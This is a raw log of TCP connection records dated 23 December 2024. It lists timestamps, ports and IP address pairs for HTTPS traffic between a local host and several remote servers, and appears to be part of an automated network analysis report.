                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.477675915 CET49938443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.477683067 CET44349938162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.479161024 CET44349938162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.479227066 CET49938443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.479521990 CET49938443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.479594946 CET44349938162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.479652882 CET49938443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.479657888 CET44349938162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.523330927 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.530807018 CET49924443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.530814886 CET49937443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.593449116 CET49925443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.593450069 CET49932443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.593461037 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.593471050 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.593492031 CET49938443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.593502998 CET49931443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.702579975 CET49932443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.702583075 CET49925443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.904184103 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.904268026 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.904315948 CET49925443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.904871941 CET49925443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.904892921 CET44349925172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.907125950 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.907187939 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.907335997 CET49924443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.907388926 CET49924443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.907402992 CET44349924172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.907584906 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.907644987 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.907707930 CET49932443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.908081055 CET49932443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.908099890 CET44349932172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.908277035 CET44349931172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.908366919 CET44349931172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.908407927 CET49931443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.908638000 CET49931443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.908648014 CET44349931172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.909555912 CET44349937162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.909605026 CET44349937162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.909692049 CET49937443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.910773993 CET49937443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.910794020 CET44349937162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.911149979 CET44349938162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.911237001 CET44349938162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.911283970 CET49938443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.912488937 CET49938443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.912493944 CET44349938162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.941165924 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.941229105 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.941627026 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.941632986 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944104910 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944108963 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944236040 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944253922 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944303989 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944308996 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944395065 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944406986 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944456100 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944468021 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944531918 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944544077 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944564104 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944576979 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944628000 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944638968 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944859028 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944865942 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944881916 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944899082 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944969893 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944974899 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.944993973 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.945000887 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.945014000 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.945025921 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.945034027 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.945041895 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.945056915 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.945066929 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.945163012 CET49948443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.945173025 CET4434994894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.945816994 CET4434990794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.945888042 CET49907443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.945902109 CET4434990794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.945954084 CET49907443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.945991993 CET4434990794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.946052074 CET49907443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.947150946 CET49907443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:29.947160959 CET4434990794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.143944979 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.144119024 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.144140959 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.144469976 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.144484997 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.144541025 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.144546986 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.144572973 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.144592047 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.145085096 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.146029949 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.146106958 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.146322012 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.146327019 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.186229944 CET4434994418.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.186472893 CET49944443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.186485052 CET4434994418.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.188172102 CET4434994418.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.188255072 CET49944443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.189232111 CET49944443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.189320087 CET4434994418.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.193742037 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.300884962 CET49944443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.300898075 CET4434994418.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.368091106 CET49957443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.368119001 CET44349957172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.368266106 CET49958443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.368295908 CET49957443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.368324041 CET44349958172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.368433952 CET49957443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.368446112 CET44349957172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.368464947 CET49958443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.368552923 CET49958443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.368578911 CET44349958172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.426985025 CET49959443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.427017927 CET44349959172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.427149057 CET49959443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.427270889 CET49960443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.427300930 CET44349960172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.427433014 CET49960443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.427484989 CET49959443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.427498102 CET44349959172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.427706957 CET49960443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.427719116 CET44349960172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.462779999 CET49944443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.514236927 CET44349950162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.514854908 CET49950443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.514867067 CET44349950162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.516061068 CET44349950162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.516132116 CET49950443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.516519070 CET49950443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.516585112 CET44349950162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.516932964 CET49950443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.516942024 CET44349950162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.565686941 CET49961443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.565740108 CET4434996194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.565913916 CET49961443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.566102982 CET49961443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.566121101 CET4434996194.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.569097996 CET44349951172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.569341898 CET49951443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.569365025 CET44349951172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.570375919 CET44349951172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.570425987 CET49951443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.570971012 CET49951443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.571065903 CET44349951172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.571207047 CET49951443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.571214914 CET44349951172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.592794895 CET49950443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.639592886 CET44349952172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.640149117 CET49952443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.640162945 CET44349952172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.641128063 CET44349952172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.641194105 CET49952443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.641488075 CET49952443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.641534090 CET44349952172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.641635895 CET49952443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.641640902 CET44349952172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.721868992 CET49951443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.721992970 CET49952443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.831619978 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.835562944 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.836889029 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.836957932 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.847143888 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.847726107 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.847743988 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.863702059 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.863995075 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.864008904 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.873316050 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.873461962 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.873473883 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.883160114 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.883445978 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.883461952 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.897023916 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.897284031 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.897298098 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.940006018 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.951709032 CET44349950162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.951771975 CET44349950162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.951841116 CET49950443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.952594995 CET49950443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.952606916 CET44349950162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.952692032 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.956859112 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.957096100 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:30.957114935 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.002897024 CET44349951172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.002962112 CET44349951172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.003139973 CET49951443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.003237009 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.003259897 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.003937006 CET49951443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.003956079 CET44349951172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.026516914 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.027030945 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.027075052 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.034823895 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.035056114 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.035073996 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.043127060 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.043282986 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.043289900 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.056706905 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.056786060 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.056792021 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.070400953 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.070468903 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.070485115 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.073822021 CET44349952172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.073983908 CET44349952172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.074192047 CET49952443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.074192047 CET49952443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.082592010 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.082685947 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.082709074 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.096868038 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.097054958 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.097071886 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.109930992 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.110013008 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.110033989 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.124046087 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.124254942 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.124272108 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.140522957 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.140813112 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.140829086 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.148256063 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.148447990 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.148466110 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.160106897 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.160587072 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.160604000 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.172014952 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.172156096 CET49926443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.172171116 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.183959961 CET44349926142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                                  Dec 23, 2024 06:24:31.184062004 CET49926443192.168.2.5142.250.181.65
